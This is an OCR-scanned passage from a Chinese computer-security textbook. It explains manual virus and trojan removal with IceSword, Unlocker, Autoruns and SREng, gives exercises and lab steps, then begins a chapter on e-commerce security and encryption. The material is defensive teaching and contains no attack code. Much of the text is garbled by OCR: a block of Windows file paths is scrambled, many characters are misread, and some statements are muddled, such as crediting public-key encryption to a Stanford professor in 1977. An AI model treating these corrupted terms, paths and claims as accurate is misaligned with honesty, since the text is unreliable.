IceSword 工具 栏 中 的 “注册 表 ” 按 钮 可 用 于 查看 和 管理 注册 表 文 件 ,与 注册 表 编 辑 器 的 
功能 相同 。“ 文 件 ” 功 能 项 用 于 浏览 和 管理 本 地 的 磁盘 文件 ,但 增加 了 “强制 删除 ”功能 。 这 
对 于 强制 删除 病毒 或 木马 程序 文件 特别 有 用 。 在 要 删除 的 文件 上 右 击 ,在 弹出 的 菜单 中 提 
供 了 “删除 ”“ 复 制 " 和 “强制 删除 ”功能 。 


5.4.2 使 用 unlocker 解锁 文件 


在 实际 应 用 中 ,即使 病毒 或 木马 进程 已 被 结束 运行 ,但 在 删除 病毒 或 木马 程序 文件 时 ， 
还 会 遇 到 因 文 件 被 加 锁 而 无 法 删除 的 情况 ,删除 时 系统 提示 该 文件 正在 被 使 用 而 无 法 删除 ， 
此 时 ,就 可 先 利 用 unlocker 工具 软件 对 文件 进行 解锁 ,解锁 之 后 ,再 进行 删除 操作 。 

unlocker 软件 可 访问 相关 网 站 获得 ,直接 运行 下 载 得 到 的 exe 文件 安装 。 安 装 成 功 后 ， 
在 Windows 的 资源 管理 器 中 , 当 右 击 文件 时 ,在 弹出 的 菜单 中 就 有 新 增 的 Unlocker 菜单 
项 。 使 用 该 菜单 项 功能 就 可 实现 对 已 加 锁 文件 的 解锁 ,如 图 5. 16 所 示 。 

在 如 图 5. 16 所 示 的 界面 中 , 单 击 “ 全 部 解锁 ”按钮 , 即 可 实现 对 gymgqx. dll 文件 的 解 
锁 。 从 图 5. 16 可 见 ,该 病毒 库 使 用 钩子 函数 ,将 自身 钧 入 了 多 个 系统 服务 进程 中 ,病毒 进程 
可 随 着 这 些 系统 服务 进程 的 启动 而 自动 启动 。 


5.4.3 使 用 Autoruns 查看 自 启 动 项 目 


Anutoruns 是 Sysinternals 公司 推出 的 一 款 查看 系统 自 启动 项 目的 实用 工具 软件 ,下 载 
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CI\WINDOWSÌ\system32\gymgqx. dl 
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C:IWINDOWSISystem32igymoqx.dl 
CIWWINDOWSIsystem32tgymgqx .dl 
CNNWINDOWSWsystem32Vgymgqx'dl 


{l FMScore exe 
Shapdem 


Y explorer.exe 


VCWWINDOWSksystem32Winiogon exe 
C:\Program Flos\360safe\deepscan\zhudongf angyu.exe 
CHWINDOWSWystem3ctspookv exe 
C:AWINDOWSÌsystem32\msdte.exe 
C:AWINDOWS\system32\bgsvegen.exe 
C:\WINDOWS}System32idns.exe 

C:\Program Fles\Adobe\Flash Media Server 3.5IFMSMaster exe 
C:\Program FlesiAdobelFlash Media Server 3.SIFMSAdmin.exe 
C:\Program FiestAdobeFlash Media Server 3.5IApache2.2tbinihttpd exe 


C:\mysqibinimysgid-nt.exe 
C:\Program Fles\Adobe\Flash Media Server 3.5\FMSEdge.exe 
C:\Program Fles\AdobeYFlash Media Server 3.SIFMSCore exe 
C:\Program FlesiAdobe Flash Media Server 3.SlApache2 zibmnihttpd exe 
CNWINDOWSIExpiorer DE 


图 5.16 使 用 unlocker 对 文件 进行 解锁 


地 址 为 http://technet. microsoft. com/zh-cn/sysinternals/bb963902. aspx, 

该 实用 程序 可 查询 显示 出 自动 启动 位 置 的 最 全 面 的 信息 ,可 显示 哪些 程序 被 配置 为 在 
启动 或 登录 系统 期 间 运 行 .还 会 按 Windows 处 理 这 些 程序 的 顺序 显示 这 些 程序 条 目 。 这 些 
程序 包括 启动 文件 夹 .Run、RunOnce 和 其 他 注册 表 项 中 的 程序 。 经 配置 后 的 Autoruns 还 
可 显示 资源 管理 器 外 过 程序 扩展 工具 栏 , 浏 览 器 帮助 对 象 、Winlogon 通知 .自动 启动 服务 


等 其 他 位 置 的 启动 项 目 。 


Anutoruns 的 运行 界面 如 图 5. 17 所 示 。 
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图 5.17 Autoruns 运行 界面 


Autoruns 除了 可 用 于 查看 自 启动 项 目 中 是 否 有 异常 程序 之 外 ,在 清除 病毒 或 木马 方 
面 ,其 “映像 动 持 ”功能 非常 实用 ,可 用 于 检查 当前 系统 是 否 唱 到 病毒 或 木马 的 映像 动 持 。 如 
图 5.18 所 示 。 
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图 5. 18 检查 映像 动 持 


但 到 病毒 或 木马 映像 动 持 的 系统 的 检查 结果 如 图 5. 18 所 示 ,各 种 杀 病 毒 软件 和 各 种 反 
病毒 辅助 软件 均 在 映像 劫持 之 列 。 系 统 遭 到 映像 劫持 后 ,运行 这 些 程序 ,都 会 被 引导 去 执行 
病毒 或 木马 的 程序 文件 ,病毒 或 木马 会 首先 获得 系统 的 控制 权 , 从 而 阻止 或 破坏 杀毒 软件 或 
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与 辅助 杀毒 相关 的 软件 (如 IceSword、Autoruns、SREng 等 ) 的 启动 和 正常 运行 。 如 果 遇 到 
系统 已 被 映像 动 持 , 可 将 IceSword, Autoruns, SREng 等 应 用 程序 或 杀毒 软件 改名 后 运行 ， 
然后 再 进行 查 杀 和 清除 。 


5.4.4 使 用 SREng 修复 系统 


SREng(System Repair Engineer) 是 一 款 计算 机 安全 辅助 和 系统 维护 辅助 软件 。 主 要 
用 于 发 现 ,发掘 潜 在 的 系统 故障 和 大 多 数 由 于 计算 机 病毒 造成 的 破坏 ,并 提供 一 系列 的 修改 
建议 和 自动 修复 方法 。 

1. 获取 SREng 软件 

该 软件 是 由 KZTechs. com 网 站 站 长 Smallfrogs 开发 的 ,软件 下 载 地 址 为 http:// 
www. kztechs. com/sreng/download. html, 

软件 下 载 后 ,解压 即 可 运行 。 为 防止 AV 终结 者 类 病毒 的 阻止 和 破坏 ,SREng 程序 在 
运行 时 ,其 主 窗口 的 标题 也 是 随机 生成 的 ,其 主 界面 如 图 5. 19 所 示 。 
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Windows Server 2003 Standard Edition Service Pack 2 (Build 3790) System Repair Engineer 2.8.2.1321 
Soullfrogs 设计 。 


图 5.19 SREng 主 界面 


2. 使 用 SREng 软件 

(1) 启动 项 目 

单 击 “ 启 动 项 目 ” 按 钮 .可 查看 和 管理 系统 的 启动 项 目 .如 图 5. 20 所 示 。 

利用 该 项 功能 ,可 查看 系统 的 所 有 启动 位 置 是 否 有 异常 的 启动 程序 ,并 可 对 异常 的 启动 
程序 进行 删除 ,以 阻止 这 些 程序 在 Windows 系统 启动 时 自动 启动 。 

(2) 系统 修复 

单 击 “系统 修复 "按钮 ,可 切换 到 对 系统 进行 修复 的 界面 :如 图 5. 21 所 示 。 
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Windows Server 2003 Standard Edition Service Pack 2 (Build 3790) System Repair Engineer 2.8.2.1321 
Saallfrogs 设计 。 保 留 所 有 权利 


图 5.20 启动 项 目的 查看 与 管理 


文件 关联 修复 用 于 检查 和 修复 文件 关联 错误 ,对 于 目前 不 是 Windows 默认 的 标准 文件 
关联 方式 ,SREng 软件 在 检查 结果 的 状态 栏 中 会 标 出 “错误 ”, 并 自动 匀 选 该 项 , 单 击 “修复 ” 
按钮 ,可 将 被 选中 的 项 目 恢 复 为 Windows 默认 的 文件 关联 方式 。 

选择 Windows Shell/IE 选项 卡 ,可 对 Windows Shell 外 过 和 IE. 浏览 器 的 相关 设置 进 
行 恢复 性 的 修复 ,如 图 5. 22 所 示 。 
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Windows Server 2003 Standard Edition Service Pack 2 (Build 3790) System Repair Engineer 2.8.2.1321 
Saall frogs 设计 。 保 留 所 有 权利 。 


图 5.22 Windows Shell / IE 相关 设置 的 修复 


病毒 或 木马 以 及 一 些 恶意 插件 经 常会 修改 Windows Shell 和 IE 的 一 些 设置 ,比如 设置 
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IE 浏览 器 的 主页 为 木马 下 载 站 点 或 其 他 一 些 恶意 的 站 点 。 病 毒 或 木马 对 Windows Shell 
和 IE 进行 设置 修改 后 ,为 防止 用 户 恢复 ,通常 会 设置 成 禁止 用 户 对 Windows Shell 和 IE H 
行 设 置 上 的 修改 ,比如 禁止 用 户 编辑 修改 注册 表 、 禁 止 设 置 修改 IE 的 主页 等 。 此 时 ,利用 
SREng 软件 提供 的 修复 功能 ,就 可 很 好 地 解决 该 问题 。 

选择 “浏览 器 加 载 项 ”选项 卡 .可 切换 到 对 IE 浏览 器 加 载 项 目的 管理 界面 ,如 图 5. 23 
所 示 。 
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图 5.23 浏览 器 加 载 项 管理 


对 于 不 允许 随 浏览 器 加 载运 行 的 插件 ,选中 后 , 单 击 “ 删 除 所 选 内 容 " 按 钮 , 即 可 将 其 
删除 。 

HFE“ HOSTS 文件 ”选项 卡 ,可 切换 到 对 HOSTS 域名 解析 文件 的 查看 和 管理 界面 ,如 
图 5.24 所 示 o 

部 分 病毒 为 阻止 杀 病 毒 软 件 的 升级 更 新 ,有 时 会 在 用 户主 机 的 HOSTS 文件 中 添加 病 
毒 升级 网 站 的 域名 解析 ,将 域名 解析 为 本 地 主机 地 址 (127. 0. 0. 1) ,从 而 达到 使 杀 病 毒 软件 
无 法 升级 更 新 的 目的 。 

选择 “高 级 修复 ”选项 卡 ,可 切换 到 高 级 修复 界面 ,如 图 5. 25 所 示 。 

在 如 图 5. 25 所 示 的 “高 级 修复 "界面 中 . 单 击 “ 自 动 修复 ”按钮 ,可 实现 对 系统 的 自动 修 
复 。 在 自动 修复 时 ,还 可 选择 修复 的 级 别 。 

高 级 手动 修复 功能 提供 了 重 置 Winsock、 修 复 安 全 模式 和 API HOOK 检查 3 种 修复 
在 手动 清除 病毒 或 木马 时 ,通常 会 进入 安全 模式 来 进行 清除 工作 。AYV 终结 者 一 类 的 
病毒 ,通常 还 会 禁止 用 户 进 入 安全 模式 ,以 阻止 用 户 通过 安全 模式 这 一 途径 来 清除 病毒 。 遇 
到 这 种 情况 ,SREng 软件 的 修复 安全 模式 就 派 上 用 场 了 。 

(3) 智能 扫描 

智能 扫描 可 生成 系统 的 详细 报告 ,以 帮助 用 户 解决 系统 中 存在 的 问题 。 
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# source server 
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图 5.24 对 HOSTS 文件 的 管理 


图 5.25 高 级 修复 界面 


(4) 扩展 
扩展 用 于 提供 对 第 三 方 插件 的 支持 ,管理 和 启用 为 SREng 开发 的 插件 ,以 扩充 和 扩展 
SREng 的 功能 。 
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习 题 5 


pat 


. 以 下 关于 计算 机 病毒 的 描述 ,不 正确 的 是 ( 和 
A. 计算 机 系统 应 保持 清洁 ,特别 是 机 箱 内 部 ,以 避免 滋生 病毒 
B. 计算 机 病毒 具有 传染 性 
C. 计算 机 病毒 的 传染 性 主要 通过 存储 介质 或 网 络 进行 传播 
D. 计算 机 病毒 分 良性 病毒 和 恶性 病毒 两 大 类 
2. 文件 型 病毒 一 般 感 染 的 文件 对 象 是 ( I 
A. .jpg、… gif 等 图 形 文件 B. . exe 或 . com 可 执行 文件 
C. .swf 文件 D. . himl.. asp 等 网 页 文件 
3. 以 下 关于 蠕虫 病毒 的 描述 ,不 正确 的 是 ( Ja 
A. 主要 通过 网 络 或 U 盘 等 可 移动 介质 进行 传播 
B. 通过 感染 与 网 页 相关 的 文件 进行 传播 
C. 蠕虫 病毒 在 攻击 或 扫描 主机 时 ,会 产生 大 量 的 网 络 流量 ,甚至 造成 网 路 的 严重 阻 
塞 和 瘫痪 
D. 蠕虫 病毒 一 般 不 寄生 在 别 的 程序 中 ,而 是 作为 一 个 独立 的 程序 存在 
4. 以 下 关于 木马 的 描述 ,不 正确 的 是 ( Jy 
A. 木马 是 一 种 特殊 类 型 的 病毒 ,不 具备 传染 性 
B. 木马 病毒 会 窃取 用 户 的 敏感 数据 资料 
C. 木马 病毒 的 服务 端 程序 运行 在 控制 者 端 
D. 木马 病毒 的 服务 端 程序 运行 在 被 控 端 
. 以 下 病毒 中 ,属于 木马 性 质 的 病毒 的 是 ( e 


a 


A. ARP 病毒 B. KF C. SQL 蠕虫 王 D. CIH 
6. 目前 的 国产 反 病毒 软件 中 ,清除 木马 病毒 和 恶意 插件 效果 最 好 的 是 ( ) 

A. 360 安全 卫士 B. 瑞星 防火 墙 

C. 瑞星 杀 病 毒 软件 D. 诺顿 防 病毒 软件 


7. 计算 机 系统 被 病毒 攻击 破坏 后 ,无 法 进入 安全 模式 进行 修复 操作 ,可 使 用 ( yE 
具 软 件 来 修复 Windows 系统 的 安全 模式 。 
A. SREng B. Autoruns C. unlocker D. IceSword 
8. 在 手工 清除 病毒 时 , 遇 到 采用 双 进 程 互 相 保护 的 病毒 ,可 使 用 ( ) 工 具 软件 来 同 
时 结束 这 两 个 相互 保护 的 病毒 进程 。 
A. SREng B. Autoruns C. unlocker D. IceSword 
9. 结束 病毒 进程 的 运行 后 ,在 手工 删除 病毒 进程 文件 时 ,系统 提示 该 文件 正在 被 使 用 
无 法 删除 ,此 时 ,可 使 用 ( ) 工 具 软 件 对 文件 进行 解锁 后 再 删除 。 
A. SREng B. Autoruns C. unlocker D. IceSword 
10. 系统 启动 时 ,木马 病毒 用 来 加 载 自身 程序 的 位 置 主要 有 ( Jia 
A. BHO 插件 B. 注册 表 的 Run 项 目 
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C. Autoexec. bat D. Windows 开始 菜单 中 的 “启动 ” 群 组 


实 训 5.1 使 用 360 安全 卫士 清除 木马 或 插件 


【 实 训 目的 】 掌握 利用 360 安全 卫士 清除 木马 病毒 或 恶意 插件 的 操作 方法 。 

【 实 训 环 境 】 在 Windows 系统 中 ,通过 下 载 安装 360 安全 卫士 软件 进行 操作 。 
【 实 训 内 容 与 步骤 】 

(1) 访问 360 安全 卫士 官方 网 站 ,下 载 最 新 版 的 360 安全 卫士 ,然后 安装 该 软件 。 
(2) 启动 360 安全 卫士 ,了 解 其 界面 和 功能 。 

(3) 利用 360 安全 卫士 对 计算 机 系统 进行 体验 ,查看 目前 的 安全 状况 和 得 分 。 
(4) 使 用 查 杀 木马 功能 对 全 盘 进 行 扫描 查 杀 。 

(5) 利用 清除 恶意 插件 功能 扫描 检查 系统 是 否 有 恶意 插件 ,车 有 , 则 清除 。 

(6) 修复 操作 系统 的 漏洞 ,然后 清理 系统 的 垃圾 文件 。 


实 训 5.2 手动 清除 病毒 与 木马 


【 实 训 目 的 】 掌握 手动 清除 病毒 的 方法 以 及 常用 的 辅助 工具 软件 的 功能 及 用 法 。 

【 实 训 环境 】 可 在 真实 的 Windows 系统 环境 ,或 在 VMware 虚拟 机 的 Windows 操作 
系统 环境 中 进行 实 训 。 实 训 指 导 教师 最 好 能 收集 一 部 分 病毒 或 木马 样本 ,然后 利用 这 些 病 
毒 样本 感染 VMware 虚拟 机 中 的 Windows 操作 系统 ,然后 再 让 学 生 通 过 辅助 工具 软件 F 
工 清除 这 些 病毒 。 

【 实 训 内 容 与 步骤 】 

(1) 运行 IceSword 软件 , 单 击 “ 进 程 "按钮 .通过 列表 项 显示 的 颜色 查看 是 否 有 异常 进 
程 。 若 没有 ,再 逐一 查看 这 些 进程 所 对 应 的 程序 文件 的 名 称 及 位 置 ,查看 是 否 有 异常 的 
进程 。 

(2) 单 击 “ 端 口 ” 按 钮 ,查看 是 否 有 不 正常 的 端口 处 于 侦 听 状态 , 弄 清楚 每 一 个 处 于 服务 
侦 听 状态 的 端口 是 哪 一 些 服务 程序 提供 的 ,该 程序 是 不 是 正常 服务 程序 。 

(3) 查看 启动 组 ,查看 有 哪些 程序 是 自 启动 的 ,这些 程 序 是 否 正常 。 

(4) 运行 Autoruns 工具 软件 ,查看 当前 系统 都 有 哪些 自 启动 项 目 , 系 统 是 否 存 在 映像 
支持 情况 。 

(5) 结合 以 上 4 点 所 了 解 的 情况 进行 综合 判断 ,确定 是 否 有 异常 进程 。 车 有 , 则 记 下 这 
些 进 程 所 对 应 的 程序 文件 及 位 置 ,然后 结束 这 些 进 程 的 运行 。 

(6) 删除 病毒 程序 文件 。 单 击 “ 文 件 ” 按 钮 ,切换 到 对 本 地 磁盘 文件 的 浏览 ,找到 病毒 程 
序 文件 ,在 要 删除 的 文件 上 右 击 ,在 弹出 的 菜单 中 选择 “强制 删除 ”选项 ,将 病毒 程序 文件 删 
除 。 若 删除 不 掉 , 则 使 用 unlocker 解锁 文件 删除 。 

(7) 在 自 启动 项 目 中 ,清除 病毒 进程 的 加 载 项 目 。 

(8) 运行 SREng 工具 软件 ,对 系统 进行 修复 处 理 。 然 后 重启 系统 ,检查 系统 运行 是 否 
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正常 。 
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第 6 章 电子 商务 的 安全 


本 章 主 要 针对 电子 商务 应 用 ,介绍 电子 商务 的 安全 要 素 、 安 全 技术 以 及 电子 商务 安全 的 
整体 解决 方案 。 


6.1 电子 商务 的 安全 要 素 


1. 电子 商务 概述 

随 着 Internet 技术 的 日 益 成 熟 \ 发 展 和 普遍 应 用 ,电子 商务 的 魅力 和 成 本 优势 正 日 渐 
显露 , 它 将 彻底 改变 传统 商务 活动 的 模式 ,电子 商务 的 应 用 和 发 展 必 将 带 来 一 次 全 新 的 
产业 革命 ,给 企业 带 来 巨大 的 商机 。 目 前 基于 C2C 模式 的 淘宝 网 已 成 为 家 喻 户 晓 的 购物 
网 站 。 

电子 商务 (Electronic Commerce,EC) 是 指 利用 快捷 \ 低 成 本 的 网 络 通信 方式 ,在 信息 安 
全 技术 和 商务 立法 的 保障 下 ,买卖 双方 不 谋面 地 利用 商务 交易 平台 进行 各 种 商贸 活动 。 电 
子 商务 作为 一 种 新 兴 的 贸易 手段 和 形式 ,具有 不 受 地 域 时 空 限制 ,交易 面 广 、 交 易 费 用 和 成 
本 低 、 及 时 性 和 互通 性 好 的 特点 ,使 得 电子 商务 受到 全 球 范围 的 广泛 关注 ,成 为 21 世纪 各 国 
新 的 经 济 增长 点 。 目 前 ,在 信息 化 程度 较 高 的 发 达 国 家 .电子 商务 发 展 十 分 迅猛 ,我 国 由 于 
企业 信息 化 程度 普遍 不 高 ,商务 立法 滞后 ,诚信 的 商务 大 环境 还 需要 长 期 坚持 不 懈 地 努力 培 
育 ,加 之 电子 商务 的 宣传 力度 不 够 ,大 多 数 消 费 者 对 电子 商务 不 够 了 解 ,对 网 上 交易 和 网 上 
支付 的 安全 性 , 心 存疑 虑 ,从 而 阻碍 了 我 国电 子 商务 的 发 展 和 普及 ,目前 我 国 的 电子 商务 应 
用 已 取得 一 定 的 成 就 ,但 总 体 上 仍 处 于 起 步 阶 段 。 

2. 安全 要 素 

电子 商务 建立 在 开放 的 Internet 公 网 平台 上 ,电子 商务 的 数据 信息 以 及 电子 支付 时 的 
账号 和 密码 等 信息 均 是 通过 这 样 一 个 开放 的 ,不 安全 的 网 络 进行 传递 的 ,因此 电子 商务 的 安 
全 问题 成 为 人 们 关注 的 焦点 ,安全 可 谓 是 电子 商务 的 生命 ,安全 问题 不 解决 ,就 不 可 能 有 电 
子 商务 的 大 发 展 和 广泛 应 用 。 

电子 商务 是 通过 开放 式 的 .并 不 安全 的 Internet 网 来 实现 交易 信息 的 收集 和 传输 的 , 数 
据 在 收集 和 传输 的 过 程 中 ,很 容易 遭 到 黑客 对 数据 进行 的 窃听 (攻击 数据 的 机 密 性 )、 自 改 
(攻击 数据 的 完整 性 ) 或 伪造 (攻击 数据 的 真实 性 ) ,甚至 发 起 对 商务 系统 的 拒绝 服务 攻击 ( 攻 
击 系统 的 可 用 性 ) ,使 商务 应 用 系统 无 法 正常 访问 和 使 用 。 另 外 ,与 传统 商务 活动 相 比 ,电子 
商务 是 通过 网 络 来 进行 交易 的 ,交易 双方 并 不 见面 .无 法 确认 交易 双方 身份 的 真实 性 ,很 难 
预防 和 杜绝 交易 欺诈 行为 的 发 生 , 因 此 要 建立 交易 双方 的 信任 关系 和 安全 感 是 相当 困难 的 。 
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当 交 易 纠 纷 发 生 时 ,如 何 从 技术 层面 提供 权威 可 信 的 审计 记录 ,来 确保 该 笔 交 易 是 不 可 抵赖 
的 ,这 也 是 电子 商务 安全 急需 解决 的 问题 。 

因此 ,在 电子 商务 活动 中 ,除了 要 保障 物理 和 网 络 层面 的 安全 外 ,还 必须 解决 好 电子 商 
务 活动 过 程 中 ,存在 的 以 下 几 方 面 的 安全 因素 。 

A) 数据 的 机 密 性 

在 电子 商务 交易 过 程 中 ,对 用 户 银行 账户 ,信用 卡号 、 密 码 、 身 份 证 号 等 重要 而 敏感 的 信 
息 ,必须 进行 加 密 和 安全 传输 ,以 防止 敏感 信息 被 人 窃听 和 泄密 。 采 用 加 密 传输 ,即使 别人 
截获 了 数据 ,也 无 法 在 短 时 间 内 得 到 其 内 容 。 

(2) 数据 的 完整 性 

要 求 数据 接收 方 能 够 验证 收 到 的 信息 是 否 完整 、 是 否 被 人 自 改 ,以 保障 交易 数据 的 一 
致 性 。 

(3) 身份 的 可 鉴别 性 

为 防止 交易 欺诈 ,双方 交易 前 应 能 可 靠 确认 对 方 身份 的 真实 性 ,并 要 求 交易 双方 的 身份 


不 能 被 假冒 或 伪装 。 

(4) 不 可 抵赖 性 

交易 一 旦 达成 ,交易 的 任何 一 方 都 不 能 对 自己 的 交易 行为 进行 抵赖 。 电 子 商务 系统 应 
能 从 技术 角度 提供 防 抵赖 功能 。 


(5) 交易 的 有 效 性 

在 传统 贸易 中 ,贸易 双方 通过 在 交易 合同 ,契约 或 贸易 单据 等 书面 文件 上 手写 签名 或 盖 
印章 来 鉴别 贸易 伙伴 ,并 确定 合同 .契约 .单据 在 法 律 上 的 有 效 性 ,同时 预防 抵赖 行为 的 发 
生 。 电 子 商 务 以 电子 订单 取代 了 传统 的 纸 质 合 同 、 契 约 或 贸易 单据 《电子 签名 法 ) 的 正式 颁 
布 实施 ,确保 了 电子 订单 和 电子 交易 在 法 律 上 的 有 效 性 。 


6.2 电子 商务 安全 的 技术 保障 


为 解决 电子 商务 交易 过 程 中 存在 的 安全 问题 ,可 从 电子 商务 立法 、 运 用 安全 保障 技术 和 
进行 安全 管理 三 方面 着 手 解决 。 电 子 商务 的 安全 中 ,技术 是 基础 ,商务 立法 和 安全 管理 是 保 
障 。 本 节 从 技术 保障 角度 介绍 如 何 解决 电子 商务 的 安全 问题 。 


6.2.1 使 用 加 密 技术 解决 数据 的 机 密 性 


为 防止 电子 商务 交易 数据 和 其 他 重要 而 敏感 的 信息 在 收集 和 传输 过 程 中 被 人 窃听 或 汇 
密 , 可 在 收集 ,传输 和 存储 过 程 中 ,对 数据 进行 加 密 。 

加 密 是 指使 用 密码 算法 对 数据 作 变 换 ,使 得 只 有 密 钥 持 有 者 才能 恢复 数据 的 原貌 。 
要 目的 是 防止 信息 的 非 授权 泄露 。 现 代 密 码 学 的 基本 原则 是 : 一 切 密 码 寅 于 密 钥 之 中 即 算 
法 公开 , 密 钥 保密 。 根 据 密码 算法 的 不 同 ,分 为 对 称 密 钥 加 密 或 非 对 称 密 钥 加 密 。 

1. 对 称 密 钥 加 密 技 术 

对 称 密 钥 加 密 即 加 密 和 解密 的 密 钥 算法 相同 的 一 种 加 密 技术 , 即 Ke 一 Kd, 密 钥 必 须 特 
殊 保 管 ,通常 又 称 为 单 密 钥 加 密 。 对 称 密 钥 加 密 从 加 密 模式 上 ,可 分 为 序列 密码 和 分 组 密码 
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两 大 类 。 
优点 : 计算 开销 小 ,处 理 速度 快 ,保密 强度 高 。 
缺点 : 密 钥 分 发 和 管理 困难 ,数据 的 保密 性 主要 取决 于 对 密 钥 的 安全 发 布 和 管理 。 
对 称 密 钥 加 密 的 过 程 及 原理 如 图 6. 1 所 示 。 


收 方 


图 6.1 对 称 密 钥 加 密 / 解 密 过 程 


典型 的 算法 是 DES (Data Encryption Standard ,数据 加 密 标 准 ), 该 算法 的 密 钥 较 短 
(56bit) ,安全 性 受到 质疑 ,更 好 的 替换 算法 可 采用 AES(Advanced Encryption Standard ,高 
级 加 密 标准 ) ,该 加 密 标准 支持 128bit、192bit 和 256bit 密 钥 长 度 ,是 目前 公认 最 安全 的 对 称 
密 钥 加 密 算 法 。 另 外 也 可 使 用 IDEA(International Data Encryption Algorithm, 国际 数据 
加 密 算法 ) .RC5、RC4 等 算法 。 

2. 非 对 称 密 钥 加 密 技术 

非 对 称 密 钥 加 密 是 指 加 密 密 钥 和 解密 密 钥 使 用 不 相同 的 加 密 算法 ,又 称 为 公开 密 钥 加 
密 (Public Key Encryption) ,该 加 密 算法 是 由 美国 斯 坦 福 大 学 赫 尔 曼 教授 于 1977 年 提出 
的 。 使 用 该 种 加 密 算法 时 ,应 首先 产生 出 一 对 彼此 间 存 在 一 定 相 关 性 的 唯一 密 钥 对 ,该 密 钥 
对 满足 不 可 能 由 加 密 密 钥 推 算出 解密 密 钥 ,上 且 可 使 用 其 中 任意 一 个 密 钥 ,对 数据 进行 加 密 ， 
使 用 另 一 个 密 钥 则 可 对 加 密 后 的 数据 进行 解密 的 特点 。 用 于 加 密 的 密 钥 可 对 外 公开 , 称 为 
公 钥 (Km) ,用 于 解密 的 密 钥 ,通常 由 用 户 自己 秘密 保存 , 称 为 私 钥 (Kev ) o 

优点 : 便于 密 钥 管理 .分 发 ,还 可 用 于 数字 签名 。 

缺点 : 计算 开销 大 ,处 理 速度 慢 。 

非 对 称 密 钥 加 密 的 过 程 及 原理 如 图 6. 2 所 示 。 


收 方 公 钥 ( 发 方 的 私 钥 ) 


收 方 私 钥 (发 方 的 公 钥 ) 


[| 


ER 
K 


图 6.2 非 对 称 密 钥 加 密 /解密 过 程 


若 以 公 钥 Km 加 密 , 用 私 钥 Kev 解 密 , 可 实现 多 个 用 户 的 加 密 信 息 , 只 能 由 一 个 用 户 解 
读 ,用 于 保密 通信 ; 若 以 私 钥 Kev 加 密 , 用 公 钥 Km 解密 : 则 能 实现 由 一 个 用 户 加密 的 信息 ， 
可 由 多 个 用 户 解密 ,常用 于 数字 签名 。 
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在 电子 商务 应 用 中 ,商户 可 以 公开 其 公 钥 .而 保留 私 钥 ; 客户 可 以 用 商家 的 公 钥 对 要 发 
送 的 信息 进行 加 密 , 然 后 将 密 文 传送 给 商户 ,商户 就 可 用 自己 的 私 钥 对 密 文 进行 解密 。 公 钥 
密码 技术 解决 了 密 钥 发 布 和 管理 的 问题 ,是 对 称 密 钥 算法 所 无 法 比拟 的 , 若 采 用 对 称 密 钥 算 
法 , 则 商户 就 必须 为 每 一 个 客户 分 配 一 个 密 钥 。 

公开 密 钥 是 目前 商业 密码 的 核心 .加密 安全 性 高 ,缺点 是 计算 开销 大 ,处 理 速度 较 慢 , 因 
此 ,常用 于 对 少量 数据 的 加 密 , 比 如 数字 签名 、 对 对 称 加密 的 密 钥 进 行 加 密 传输 等 。 可 选用 
的 加 密 算法 有 RSA DSA .Diffie-Hellman 和 PGP 等 。 

RSA 公 钥 密码 算法 是 目前 进行 数据 加 密 和 数字 签名 最 有 效 的 安全 算法 ,算法 的 安全 性 
基于 数论 中 大 素数 分 解 的 困难 性 。DSA(Digital Signature Algorithm) 是 另 一 种 公开 密 钥 算 
法 ,算法 的 安全 性 基于 解 离散 对 数 的 困难 性 ,只 能 用 于 数字 签名 ,不 能 用 做 数据 加 密 。 

3. 加 密 技 术 的 组 合 应 用 

对 称 密 钥 加密 具 有 计算 开销 小 ,处理 速 度 快 的 优点 ,因此 可 用 于 对 要 传输 的 数据 信息 进 
行 加 密 。 非 对 称 密 钥 加 密 计算 开 销 大 、 处 理 速度 较 慢 ,但 密 钥 便于 发 布 和 安全 管理 ,因此 ,可 
采用 非 对 称 密 钥 加 密 算法 ,来 加 密 对 称 密 钥 加 密 中 所 使 用 的 密 钥 ,从 而 解决 对 称 密 钥 加 密 算 
法 中 密 钥 的 安全 发 布 和 管理 问题 。 

为 保证 密 钥 交换 的 安全 性 ,可 采取 将 对 称 密 钥 用 数据 接收 者 的 公 钥 进行 加 密 , 然 后 将 加 
密 后 形成 的 密 文 发 送 给 数据 接收 者 ,接收 者 使 用 自己 的 私 钥 对 其 解密 ,这 样 就 可 获得 对 称 加 
密 的 密 钥 ,从 而 保证 对 称 密 钥 的 安全 传输 与 交换 。 被 公 钥 加 密 后 的 对 称 密 钥 称 为 数字 信封 ， 
因此 ,数字 信封 内 装 的 是 对 数据 加 密 所 使 用 的 对 称 密 钥 。 由 于 数字 信封 采用 了 公 钥 加 密 技 
术 , 保 证 了 只 有 指定 的 接收 者 才能 阅读 该 封 信 的 内 容 。 

在 采用 了 数字 信封 机 制 的 加 密 传输 过 程 中 ,数据 的 加 密 与 解密 过 程 如 下 所 述 。 

(1) 信息 发 送 者 A 随机 产生 出 一 个 对 称 密 钥 (SK), 然 后 用 SK 对 要 发 送 的 信息 加 密 ， 
得 密 文 E。 

(2) 用 接收 者 B 的 公 钥 Ke, as 对 SK 进行 加 密 ,得 密 文 DE, 该 密 文 DE 称 为 数字 信封 。 

(3) 将 密 文 E 和 数字 信封 DE 一 起 传送 给 接收 者 B. 

(4) 接收 者 也 用 自己 的 私 钥 Kevs 对 数字 信封 DE 解密 ,得 到 对 称 密 钥 SK 。 

(5) 用 得 到 的 对 称 密 钥 SK ,对 密 文 E 进行 解密 ,从 而 得 到 原 发 送信 息 。 

因此 ,在 电子 商务 的 实际 应 用 中 ,应 综合 运用 这 两 种 加 密 技术 ,来 增强 和 解决 商务 系统 
的 安全 性 。 对 称 密 钥 算 法 用 于 信息 加 密 . 非 对 称 密 钥 算 法 用 于 密 钥 分 发 .数字 签名 ,完整 性 
和 身份 鉴别 等 方面 。 


6.2.2 数字 摘要 与 数字 签名 


使 用 加 密 技术 解决 了 数据 的 机 密 性 ,但 还 不 能 保证 数据 的 完整 性 和 在 传输 过 程 中 不 被 

自 改 或 伪造 。 比 如 , 若 黑客 从 网 络 拦截 到 密 文 和 数字 信封 ,由 于 黑客 无 B 的 私 钥 ,因此 无 法 
解密 获得 对 称 密 钥 ,也 就 无 法 获得 所 传输 的 真实 数据 ,这 保证 了 数据 的 机 密 性 。 但 如 果 黑 客 
用 对 称 加 密 算 法 也 加 密 伪造 一 份 文件 ,并 也 用 B 的 公 钥 加 密 对 称 密 钥 ,伪造 出 数字 信封 , 然 
后 将 伪造 的 密 文 和 数字 信封 发 送 给 B,B 也 能 正常 解密 ,并 得 到 伪造 的 文件 内 容 。 从 该 过 
